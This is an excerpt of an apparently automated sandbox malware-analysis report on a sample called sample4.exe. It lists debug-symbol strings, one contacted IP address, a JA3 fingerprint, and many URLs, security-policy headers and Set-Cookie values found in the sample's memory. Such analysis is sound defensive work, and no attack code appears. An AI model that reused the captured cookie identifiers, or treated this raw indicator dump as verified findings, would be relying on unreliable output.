Source:	Binary string: gdiplus.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb@ source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.368794303.0000000003011000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.385888353.0000000002BCD000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbv source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdbR source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdbr source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb: source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb^ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbX source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbF source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbj source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb< source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb0 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb9 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_00125BE6 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_00125BE6

Source: Joe Sandbox View

IP Address: 104.244.42.131 104.244.42.131

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: <a class="ac-gf-directory-column-section-link analytics-exitlink" data-analytics-event="link.click" data-analytics-link-component_type="Simple List" data-analytics-link-component_name="Apple Support Videos" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow">Apple Support Videos</a></li> equals www.youtube.com (Youtube)
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: <a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit @AppleSupport on Twitter" data-analytics-link-url="https://twitter.com/AppleSupport" href="https://twitter.com/AppleSupport"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-twitter.png" alt="Visit @AppleSupport on Twitter" width="32" class="as-social-channel-img" height="32"></a><a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit Apple Support on YouTube" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-youtube.png" alt="Visit Apple Support on YouTube" width="32" class="as-social-channel-img" height="32"></a></div> equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: <a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit @AppleSupport on Twitter" data-analytics-link-url="https://twitter.com/AppleSupport" href="https://twitter.com/AppleSupport"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-twitter.png" alt="Visit @AppleSupport on Twitter" width="32" class="as-social-channel-img" height="32"></a><a class="as-social-channel-link analytics-exitlink" data-analytics-event="link.component_click" data-analytics-link-component_type="Social Channel" data-analytics-link-component_name="Visit Apple Support on YouTube" data-analytics-link-url="https://www.youtube.com/applesupport" href="https://www.youtube.com/applesupport" rel="nofollow"><img src="/content/dam/edam/applecare/images/en_US/more_icons/social-icon-youtube.png" alt="Visit Apple Support on YouTube" width="32" class="as-social-channel-img" height="32"></a></div> equals www.youtube.com (Youtube)
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: "https://www.youtube.com/applesupport", equals www.youtube.com (Youtube)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: ccontent-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigita equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: content-security-policy: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-66a7b38d8dab6de95efafad032bbc48'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self' equals www.twitter.com (Twitter)
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: x-response-time106x-frame-optionsSAMEORIGINx-connection-hash395ee1170928cc07d57c2eb030caea0fstrict-transport-securitymax-age=631138519content-security-policydefault-src 'self' ; connect-src 'self' https://api.twitter.com https://syndication.twitter.com https://www.google-analytics.com https://.tt.omtrdc.net https://s1259914507.t.eloqua.com https://resources.digital-cloud-prem.medallia.com https://udc-neb.kampyle.com/ https://feedback.digital-cloud-prem.medallia.com; font-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com data:; frame-src 'self' https://twitter.com https://.twitter.com; img-src 'self' https://.twimg.com https://.twitter.com https://www.google-analytics.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com https://twitter.com/i/jot https://udc-neb.kampyle.com/ data:; media-src 'self' https://.twimg.com https://.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; object-src 'self' ; script-src 'self' 'sha256-ppW1Vv+qSVcs+/pIj1ZXvMiCLoyHyCdRqtDMeK9fQ9w=' https://.twitter.com https://static.ads-twitter.com 'nonce-4f455c5f4ddc2e0bfe34643ab6a64d2'; style-src 'self' 'unsafe-inline' https://.twimg.com https://*.twitter.com https://cdn.cms-twdigitalassets.com https://cdn.goglobalwithtwitter.com; report-uri https://twitter.com/i/csp_report; frame-ancestors 'self'Persistent-AuthWWW-AuthenticateCookie,X-Twitter-Internal,X-Twitter-IP-TagsVarycms-csp-nonce=4f455c5f4ddc2e0bfe34643ab6a64d2; Max-Age=15; Expires=Thu, 14 Jan 2021 03:05:33 GMT; Path=/; Securect0=7258d2ba7a6c2d02c3400c3a2bdda373; Max-Age=21600; Expires=Thu, 14 Jan 2021 09:05:18 GMT; Path=/; Domain=.twitter.com; Secureguest_id=v1%3A161059351865331646; Max-Age=63072000; Expires=Sat, 14 Jan 2023 03:05:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=Nonepersonalization_id="v1_SvL+XoOy6IEEqs+XhRe5GQ=="; Max-Age=63072000; Expires=Sat, 14 Jan 2023 03:05:18 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=NoneSet-Cookietsa_oServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocation"2ad86-5b8cc985f752d"ETagAuthentication-Info29766AgebytesAccept-RangesWed, 13 Jan 2021 18:49:12 GMTLast-ModifiedThu, 14 Jan 2021 03:15:18 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingapplication/javascriptContent-Type175494Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 14 Jan 2021 03:05:18 GMTDateProxy-ConnectionConnectionmax-age=600Cache-Controlp equals www.twitter.com (Twitter)

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: http://certs.apple.com/apevsrsa2g1.der06
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: http://crl.apple.com/apevsrsa2g1.crl0
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.apple.com/ocsp03-apevsrsa2g1010
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: http://ogp.me/ns#
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/Organization
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/VideoObject
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.apple.com/support/products/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://about.twitter.com/en_us/company.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://about.twitter.com/en_us/company/brand-resources.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://about.twitter.com/en_us/company/twitter-for-good.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://about.twitter.com/en_us/safety.html
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://abs.twimg.com/favicons/favicon.ico
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://apps.apple.com/app/apple-store/id1130498044?pt=2003&ct=support.footer&mt=8
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://apps.apple.com/app/apple-store/id1130498044?pt=2003&ct=support.footer&mt=8
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.3.1.js
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://blog.twitter.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://blog.twitter.com/developer/
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://blog.twitter.com/en_us/topics/company/2020/allyship-right-now-black-lives-matter.html
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://blog.twitter.com/en_us/topics/company/2020/covid-19.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://blog.twitter.com/engineering/en_us.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://business.twitter.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://business.twitter.com/en/advertising.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://business.twitter.com/en/help.html
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://business.twitter.com/en/resources.html
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://c3web.trafficmanager.net/topic/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://cards-dev.twitter.com/validator
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://careers.twitter.com/
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.cms-twdigita
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.cms-twdigitalassets.com
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.cms-twdigitalassets.com/content/dam/help-twitter/logos/card_wide_blue.png
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.goglobalwithtwitter.com
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.goglobalwithtwitter.com;
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://channel9.msdn.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://data.twitter.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://developer.twitter.com/en
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://developer.twitter.com/en/community
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://developer.twitter.com/en/docs
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://developer.twitter.com/en/more/developer-terms
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://discussions.apple.com
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://eus-streaming-video-rt-microsoft-com.akamaized.net/51e203bd-a709-4164-8298-4679bd089499/7681
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://feedback.digital-cloud-prem.medallia.com;
Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmp	String found in binary or memory: https://getsupport.apple.com/?caller=home&PRKEYS=
Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmp	String found in binary or memory: https://getsupport.apple.com/?caller=home&PRKEYS=
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ar
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/bg
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/bn
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ca
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/contact-us
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/content/dam/help-twitter/brand/logo.png
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/cs
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/da
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/de
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/el
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/a-safer-twitter
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/contact-us
